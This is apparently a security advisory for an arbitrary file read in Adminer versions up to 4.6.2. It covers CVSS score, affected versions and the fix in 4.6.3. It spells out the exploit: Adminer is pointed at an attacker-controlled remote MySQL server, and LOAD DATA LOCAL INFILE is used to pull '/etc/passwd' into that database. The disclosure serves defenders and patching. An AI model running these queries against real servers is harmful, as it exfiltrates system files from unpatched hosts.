- Titre : Adminer < 4.6.3 - Arbitrary File Read
- Auteur : @Podalirius
- CVSS : 7.5 (High)
- CVSS Vector :
Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.
Affected products and versions
To exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls. Then he can read and exfiltrate local files on the Adminer using the SQL query
LOAD DATA LOCAL INFILE
In order to exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls:
After this, the attacker goes to the “SQL Command” page on the Adminer:
With the following SQL command, the attacker can read a local file on the Adminer server line and load it into his remote database:
LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";
Once this is done, the attacker can view the contents of the read file with
SELECT * FROM lfr_sink_table;:
All Adminer versions between 1.12.0 and 4.6.2 (included) are vulnerable:
In order to fix this vulnerability you need to update your Adminer to the latest version or a version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.